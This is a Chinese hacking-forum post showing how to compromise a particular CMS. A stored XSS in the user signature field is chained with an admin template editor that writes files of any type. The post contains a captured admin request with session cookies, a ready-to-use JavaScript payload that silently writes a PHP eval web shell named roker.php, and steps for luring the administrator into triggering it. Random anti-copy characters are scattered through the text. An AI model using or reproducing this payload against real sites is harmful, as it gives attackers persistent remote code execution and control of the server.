|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
. t5 U1 r! M( l! l4 [7 x( H P官网已经修补了,所以重新下了源码
I i# q" [' t因为 后台登入 还需要认证码 所以 注入就没看了。
, D; l8 p! F- O( W1 A存在 xss0 y2 }9 ]( p) v5 A. c
漏洞文件 user/member/skin_edit.php6 w F/ Y; f- [/ u( x
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
3 p# R" w5 @0 a6 s " o1 E7 E) v- i
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
0 H/ L4 }$ f! a0 z$ v & [ Z/ c9 b; W0 c+ ^' V
</textarea></td></tr>
: L: e+ s I! {% G& G ` ; r/ [; i! x$ |7 m* C; }. x
user/do.php
: E; t2 j/ `& a( D& B% Y. w! d
( U+ c& w/ o6 m4 y& Q& {3 ~0 k9 `4 { U b; |$ m. u4 O3 r
if($op=='zl'){ //资料
+ G W {. M. c9 m3 f1 H
: m; y* _5 K7 ^$ ]& l if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) ( r3 Z# O: a- Z2 y$ H
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
1 q9 a! [$ d3 m, v4 P& i
" J* k9 T1 y1 T5 d( C $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',2 ~* M' V2 r- T
: }% C& P7 \" N3 u% v
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
1 x1 L* O3 _9 c7 i T9 Z6 x where CS_Name='".$cscms_name."'";
7 h* n& F1 P. @6 K4 ^. a
& u( ^% y1 r- U" G if($db->query($sql)){. s' b1 T8 v" G4 P Z5 B& q+ [
' v; L: X6 V" S S9 W- B
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));7 V9 |- `4 J# y' m7 N
, X5 P9 D- x' y9 N* V/ n1 H
}else{8 f% q. q( ]; K' E
5 h' F! ^6 l) G+ H- k
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
/ p1 r$ F1 ]: M. H! P* w 6 T8 a& j5 ?" t; f$ y4 y
}( X9 `- e9 s6 Y( q4 ?! O$ L/ I: `# M
6 M8 j0 D0 b( l9 T
4 r) j8 o/ r/ }+ L& ]
没有 过滤导致xss产生。
$ n @* ~: x. V3 k4 m后台 看了下 很奇葩的是可以写任意格式文件。。3 k8 r3 _+ P" L) ~, Z
抓包。。7 d& x7 l! ~% q3 y1 i; f4 K; [
" M- y! b9 n6 t3 X% y! X' j( ?( Q5 h4 G
" c5 T. O* S4 P本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
. k% v4 b; T6 T
2 L2 n+ }& |, s2 I" Q- G: NAccept: text/html, application/xhtml+xml, */*2 r2 d1 q' U% Q6 q4 z
8 @$ _$ B/ _7 _1 W( g
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
; \6 W8 @3 O# S6 l1 E& L
8 j2 ~' t8 X5 K. }2 L1 J2 Y8 xAccept-Language: zh-CN
2 n _% A6 C; S) Z7 ?% h ' U* d6 M# D% }$ k4 W2 q1 B
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)4 d3 P6 a: Q7 `6 c
8 g1 ^: @. Z2 b8 ]+ {6 f
Content-Type: application/x-www-form-urlencoded1 t4 L* q1 J+ `; O! \
% r t/ e' G- I( f* ~$ b! aAccept-Encoding: gzip, deflate
- y; b% ?$ p9 ~' ^ 2 {: t r) O' |% \! s
Host: 127.0.0.1
- ~+ U& M2 C( N2 ?, T / O% \7 }- C! u2 ^2 c7 I) Y) l) _
Content-Length: 38+ Z$ Y4 i1 ?$ @
& j b( p8 }# _2 u
DNT: 1% f1 m) L1 U h7 y
5 M, |3 r* ~9 i! N& s% cConnection: Keep-Alive
; ^; k9 Z4 q! c2 f' p
, S8 k: c6 a+ M8 f5 FCache-Control: no-cache9 b) t$ K4 _" K. M$ t* J* `
/ H3 @ e/ h% _4 s2 d1 l
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
1 y. {! b" o; H/ j' r+ F
6 M+ Q; Z& [2 v/ U% A: l* \/ H$ H0 A
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
5 B. z, p9 Y1 `4 ^ I e
9 F# [2 t0 z( v, Q' @7 g8 T1 L3 s+ q! |! b! W s
1 D7 R4 X! _# B6 Y% D7 \
于是 构造js如下。$ ?" n) i* |! k) v; l
5 W0 P8 T! m; @0 |5 ^
本帖隐藏的内容<script>
7 i3 ~; r. ^' ?9 {6 V# Y& Y' CthisTHost = top.location.hostname;
2 b+ L7 N9 ~4 o $ J0 t# J) r a
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";+ `8 P+ R$ ^% ^; F; p6 e
1 o) [- [# [: D8 b6 n0 @6 xfunction PostSubmit(url, data, msg) {
, z. P, @1 |" K7 Y% A/ C+ S var postUrl = url;
9 n% ^3 M% D0 x1 s
, m. C" j. a* W$ {4 z var postData = data; & K5 m/ S4 P$ _$ p1 d
var msgData = msg;
& T3 U% s- _8 b$ f- n var ExportForm = document.createElement("FORM"); ; s D( O% L c$ e9 A
document.body.appendChild(ExportForm); - _9 v* \7 C# {8 o# o% c9 F8 `7 e
ExportForm.method = "POST";
& s# n1 R: P$ ~2 p; |) Z; D var newElement = document.createElement("input"); * h: E1 U4 q7 ]7 {. _- y* O! x* c
newElement.setAttribute("name", "name");
' Q0 K5 v9 o! c7 u+ C) R% F newElement.setAttribute("type", "hidden"); " b+ E8 ?2 o0 g, [5 L, Y3 @# m0 P# h
var newElement2 = document.createElement("input");
' |7 Z0 G( `; n$ q( {/ b0 x0 A newElement2.setAttribute("name", "content");
; {' s8 x) W; C0 C X. X5 U" S newElement2.setAttribute("type", "hidden");
" A) r& W8 w3 _+ i! x$ z ExportForm.appendChild(newElement);
^( \) a5 A" v0 G# @' _9 M ExportForm.appendChild(newElement2); , B; |5 g6 f5 h% H4 Y9 H- H
newElement.value = postData; 0 O4 ]( J2 o3 K3 [( E: t5 m
newElement2.value = msgData; ' B: R j% r, ~; ?( H' [
ExportForm.action = postUrl; * i3 I, c8 E% t
ExportForm.submit(); * m8 _% R& p) X3 I) x4 ]0 P
};% v: K7 a- d; u9 b% e/ i
. K2 n4 d8 z7 F" ~
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");/ I$ i* J& g, ~
( s S$ f% r+ ?4 k7 V7 `1 x; C4 N
</script>: p5 z- E" b" N8 z) |+ H, ? N
* B9 W) q0 n4 k8 _5 I. A1 R5 ~8 }6 ~" U, ~
3 a. j2 j7 L/ h: K# s: hhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入* o4 L, ?) ^# s$ s4 A
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)8 W3 Z# f# A: ]& B6 }( Z
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
x6 D4 ]1 t% _1 p
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对